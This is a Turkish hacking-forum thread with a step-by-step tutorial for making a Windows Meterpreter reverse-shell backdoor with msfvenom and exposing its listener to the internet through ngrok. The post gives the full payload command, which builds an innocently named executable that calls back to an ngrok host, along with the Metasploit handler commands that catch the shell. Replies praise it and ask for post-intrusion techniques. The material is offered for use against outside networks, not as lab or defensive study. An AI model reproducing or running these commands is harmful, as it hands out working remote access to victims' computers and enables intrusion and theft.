//M E T A S P L O I T\\ ile Dış Ağlara Backdoor Açalım !

Nikon of Disast

Uzman üye
16 May 2020
1,640
1,172
Hepinize merhaba arkadaşlar bu konumda sizlere MSFVenom ve Met@sploit ile dış ağlara backdoor açılımını göstereceğim.

Bu konuda şunları öğreneceksiniz:

M E T A S P L O I T nedir?
Ngrok nedir?
Ngrok nasıl çalışır?
M S F V E N O M nedir?
Exploit nedir?
Payload nedir?
Port nedir?
Resimli anlatım.




Met@sploit nedir?

Met@sploit, sistemdeki zâfiyetler hakkında bilgi veren, pentest ve IDS'nin gelişimine yardımcı olan bir konsol uygulamasıdır.



Ngrok nedir?

Ngrok, local ağı port yardımıyla internete açan bir uygulamadır.



Ngrok, nasıl çalışır?

Ngrok, belirttiğiniz protokol ve port ile local ağı internete açık hale getirir.



MSFVenom, nedir?

MSFVenom, MSF'e bağlı olan bir payload oluşturmak için kullanılan terminal uygulamasıdır.



Exploit nedir?

Hedef sistemdeki zâfiyetlerden yararlanmak için yazılan scripttir.
Yazıldığı dillere örnek vermek gerekirse: C, C++, Ruby gibi diller kullanılarak yazılır.




Payload nedir?

Payload, exploit işlemi başarılı olduğu süreçte hedefe gönderilip çalıştırma emri verilen modüldür.



Port, nedir?

Port, bir bağlantının iletişim uç noktasıdır.



Resimli anlatım.

Ngrok hesabı oluşturalım:

Ngrok'un kendi sitesi olan "ngrok.com" sitesine girelim ve sign up tuşuna basalım.



Sonrasında istenilen bilgileri doldurarak kayıt olalım.



Bize lazım olan kısım "2." kısımdır. Bunu bir köşeye yazalım.



Ngrok'u indirelim.



Ngrok indikten sonra terminale "2." kısımdaki kodu yazalım.

Sonrasında ./ngrok tcp 22 komutuyla tcp protokolü kullanarak 22. portu dinlemeye alalım ve yönlendirme işlemini local hostumuza yapsın.



MSFVenom ile backdoor oluşturalım.

Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18504 -f exe R > Green.exe

Backdoorumuz oluştuktan sonra onu dinlemeye almak için terminale "msfconsole" yazalım.

MSFConsole açıldıktan sonra terminale şunları yazalım:

Kod:
use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 22



Terminale "run" yazdığımızda backdoor'u dinlemeye alacağız.


Konuda ki terimler:

Backdoor: Arka kapı
Local: Yerel
Host: Ağ
Local Host: Yerel Ağ
 
Son düzenleme:

ARSEF7

Katılımcı Üye
29 Şub 2020
880
209
ARS3F
Eline Sağlık açıklamalar, terimleri paylaşman güzel olmuş
 
Son düzenleme:

Dolyetyus

Özel Üye
21 Nis 2020
1,208
676
Delft
Gerçekten yararlı bir konu. Daha fazla kişiye ulaşması için international foruma ekleyebilirim :)
 

Codx

Katılımcı Üye
30 Tem 2017
309
1
Karıştırılan kavramları güzel açıklamışsın eline sağlık.
 

PourLa

Uzman üye
27 Mar 2016
1,659
30
Seni ileri de Sisteme sızıp sızdıktan sonraki yapılabilicek işlemleri anlattığın veya örnekler ile açıkladığın konular bekliyoruz.
 

Pelacanus

Katılımcı Üye
28 Haz 2020
462
140
Eline sağlık güzel olmuş fakat sunu belirtmek isterim ngrokta kullandığın 22 portu genellikle ftp serverlerinde kullanıldığı için sorun yaratabilir. O nedenle servislerin kullanmadığı portları tercih etmen daha verimli olacaktır.
 

Nikon of Disast

Uzman üye
16 May 2020
1,640
1,172
Eline sağlık güzel olmuş fakat sunu belirtmek isterim ngrokta kullandığın 22 portu genellikle ftp serverlerinde kullanıldığı için sorun yaratabilir. O nedenle servislerin kullanmadığı portları tercih etmen daha verimli olacaktır.

Bende daha önce hiç sorun olmadı çok uzun zamandır bu yöntemi kullanarak yapılabilecekleri araştırıyorum her zaman 22. portu tercih ediyorum.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.